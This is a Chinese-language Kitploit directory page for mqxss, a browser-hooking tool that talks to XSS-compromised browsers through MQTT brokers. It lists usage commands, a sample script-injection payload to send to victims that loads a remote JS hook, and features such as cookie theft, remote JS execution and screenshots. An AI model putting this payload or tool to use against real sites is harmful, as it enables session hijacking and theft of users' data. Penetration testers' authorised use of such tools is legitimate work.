Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
mqxss — 基于 MQTT 的 Hooked 浏览器通信 | Kitploit
工具/GitHubGitHub/grampae/mqxss
Payload生成Web应用程序漏洞利用信息收集渗透测试命令与控制红队远程访问工具
GitHubgrampae/mqxss

mqxss

基于 MQTT 的 Hooked 浏览器通信

查看仓库
832年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

mqxss v0.2

mqxss 作为客户端,通过 MQTT 与已挂钩的浏览器通信

Screenshot from 2023-07-03 15-15-35

与 beef 或 xsshunter 相比,使用本工具的好处在于,除了托管 JS payload 之外无需任何基础设施搭建;你可以使用公共 broker(不过目前使用混淆,加密功能正在开发中)。

已挂钩的浏览器将在你指定的 broker 上的 MQTT 主题中进行通信,有许多公共/免费 broker 可用于测试。

客户端使用 Python 的 paho.mqtt 库,而 JS payload 使用 'mqttws31.min.js',该文件从 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js' 获取。


使用说明

Screenshot from 2024-01-17 11-34-59

要生成用于挂钩浏览器的 JS payload,请在运行时设置 -g 标志,并提供你的 broker、端口和主题变量。这样会在 /js/ 文件夹中创建你的 payload。

运行客户端:按如下方式提供你的 broker、端口和主题

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

使用凭据运行客户端:按如下方式提供你的 broker、端口、用户名、密码和主题

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

向受害者发送你的 XSS payload,同时保持 mqxss 客户端运行,例如:'"><script src=https://example.com/x.js async></script> 或类似内容。如果目标存在漏洞,你应该会收到通知,提示浏览器已连接,并附带一些基本信息,包括 cookie 等。

a


功能:

  • JS payload 使用 MQTT QoS 1 和 Last Will,当客户端未连接 broker 期间发生的断开或连接事件,mqxss 都会收到通知
  • 在运行时生成 JS payload 以挂钩浏览器
  • 目前仅支持使用安全 WebSocket 的 MQTT broker
  • 方便地在浏览器中打开已挂钩浏览器的地址,并附带捕获的 cookie
  • 挂钩后会抓取 cookie、IP、设备类型、用户代理
  • 查看历史已挂钩(现已取消挂钩)的浏览器
  • 向当前已挂钩的浏览器发送 JS,并在可用时获取响应
  • 对已挂钩的浏览器进行截图
  • 为需要认证的 broker 在运行时设置用户名和密码
  • 通过在 mqxss.py 中设置 ptoken 和 userkey 变量,然后使用 -po 命令行标志,实现 Pushover 通知
下载工具